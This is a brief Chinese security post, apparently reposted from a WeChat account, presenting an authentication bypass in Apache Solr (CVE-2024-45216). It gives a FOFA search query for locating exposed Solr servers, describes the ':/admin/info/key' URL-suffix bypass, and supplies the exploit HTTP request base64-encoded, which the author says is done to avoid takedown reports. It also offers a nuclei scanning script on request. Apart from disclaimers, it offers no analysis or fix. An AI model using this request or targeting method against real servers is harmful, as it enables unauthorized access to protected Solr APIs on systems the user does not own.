FOFA: app="APACHE-Solr"
通过在URL末尾使用":/admin/info/key",可以绕过PKIAuthenticationPlugin,以便未经授权的用户可以访问受保护的API。
请求包:
R0VUIC9zb2xyL2FkbWluL2luZm8vcHJvcGVydGllczovYWRtaW4vaW5mby9rZXkgSFRUUC8xLjEKSG9zdDogMTI3LjAuMC4xClNvbHJBdXRoOiBYWFhYWA==
最近文章老被举报,以后就不露请求包和脚本了,这个解码一下
地址:http://www.hiencode.com/base64.html
后台回复 CVE-2024-45216 下载
注:本文中提到的漏洞验证 poc 或工具仅用于授权测试,任何未经授权的测试均属于非法行为。任何人不得利用本文中的技术手段或工具进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
原文始发于微信公众号(扫地僧的茶饭日常):Apache Solr身份验证绕过漏洞CVE-2024-45216(附nuclei脚本)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论